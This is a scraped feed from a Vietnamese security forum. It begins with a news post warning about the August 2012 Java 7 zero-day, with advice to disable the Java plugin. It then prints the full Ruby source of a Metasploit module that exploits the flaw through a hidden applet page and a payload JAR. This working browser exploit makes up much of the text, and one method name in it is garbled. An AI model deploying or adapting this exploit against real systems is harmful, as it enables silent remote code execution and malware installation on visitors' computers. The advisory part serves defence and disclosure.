/hvaonline/posts/list/13.html JForum - http://www.jforum.net Lỗi 0-day mới cực kỳ nguy hiểm trong Java Runtime Environments - Nguy cơ tấn công diện rộng vào người dùng cuối Ngày 26/08/2012, Trong khi phân tích một mẫu malware có xuất xứ từ Trung Quốc các chuyên gia tại viện nghiên cứu bảo mật FireEye đã phát hiện một lỗi bảo mật 0-day cực kỳ nghiêm trọng trong Java Runtime Environment ( JRE ) ở hầu hết các phiên bản. Các chuyên gia xác nhận rằng đã khai thác thành công lỗi này trên Firefox bản mới nhất với JRE 1.7 update 6 ( phiên bản JRE mới nhất hiện nay ). Họ đã thành công trong việc cài đặt và kích chạy một virus (malware) trên máy tính thử nghiệm thông qua việc cho máy tính này truy cập một trang web trông có vẻ vô hại nhưng chứa mã khai thác. Vấn đề trở nên nghiêm trọng hơn khi mã khai thác minh họa ( Proof-of-Concept ) đã được cung cấp rộng rãi trên internet cũng như sắp được cập nhật vào công cụ khai thác tự động nổi tiếng Metasploit. Các chuyên gia cảnh báo là có thể sẽ có một đợt tấn công diện rộng xảy ra do Oracle hiện vẫn chưa có kế hoạch cập nhật bản vá lỗi này. Ý kiến của HVA: Đây là lỗi đặc biệt nghiêm trọng có thể sử dụng để cài đặt các loại malware như virus, trojan, keylogger… lên máy của nạn nhân thông qua một website trông có vẻ bình thường. Giả sử trong một trường hợp đáng ngại là các tin tặc thậm nhập được vào các website lớn như các trang tin, cổng thông tin, web-game… thì con số máy tính bị cài đặt mã độc sẽ lên đến hàng trăm thậm chí hàng ngàn vì chỉ cần người dung truy cập các trang web này với plugin Java Runtime cài đặt sẵn trong máy ( hầu hết máy tính đều có ) thì sẽ bị tin tặc âm thầm cài đặt mã độc lên máy. Cách phòng chống: Vì hiện chưa có bản vá nên đề nghị người dùng nên tắt plugin Java Runtime Environments trong Firefox, chrome hoặc tạm thời gỡ bỏ JRE khỏi máy tính cho đến khi Oracle cung cấp bản vá cho lỗi này xnohat – HVA News Tham khảo: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html http://pastie.org/4594319 Chú giải: Lỗi 0-day: là các lỗi bảo mật được các tin tặc âm thầm phát hiện, đã có mã khai thác thành công, nhưng không công bố và nhà sản xuất chưa có bản vá kịp thời ]]> /hvaonline/posts/list/43258.html#268810 /hvaonline/posts/list/43258.html#268810 GMT /hvaonline/posts/list/43258.html#268816 /hvaonline/posts/list/43258.html#268816 GMT /hvaonline/posts/list/43258.html#268818 /hvaonline/posts/list/43258.html#268818 GMT /hvaonline/posts/list/43258.html#268833 /hvaonline/posts/list/43258.html#268833 GMT http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Java 7 Applet Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability Discovery 'jduck', # metasploit module 'sinn3r', # metasploit module 'juan vazquez', # metasploit module ], 'References' => [ #[ 'CVE', '' ], #[ 'OSVDB', '' ], [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ], [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ] ], 'Platform' => [ 'java', 'win', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Arch' => ARCH_JAVA, } ], [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 26 2012' )) end def on_request_uri( cli, request ) if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_wwwect(cli, get_resource() + '/', '') return end print_status("#{self.name} handling request") send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) return end paths = [ [ "Exploit.class" ] ] p = regenerate_payload(cli) jar = p.encoded_jar paths.each do |path| 1.upto(path.length - 1) do |idx| full = path[0,idx].join("/") + "/" if !(jar.entries.map{|e|e.name}.include?(full)) jar.add_file(full, '') end end fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path ), "rb") data = fd.read(fd.stat.size) jar.add_file(path.join("/"), data) fd.close end print_status("Sending Applet.jar") send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html html = "<html><head></head>" html += "<body>" html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">" html += "</applet></body></html>" return html end end]]> /hvaonline/posts/list/43258.html#268847 /hvaonline/posts/list/43258.html#268847 GMT /hvaonline/posts/list/43258.html#268882 /hvaonline/posts/list/43258.html#268882 GMT /hvaonline/posts/list/43258.html#268919 /hvaonline/posts/list/43258.html#268919 GMT /hvaonline/posts/list/43258.html#273059 /hvaonline/posts/list/43258.html#273059 GMT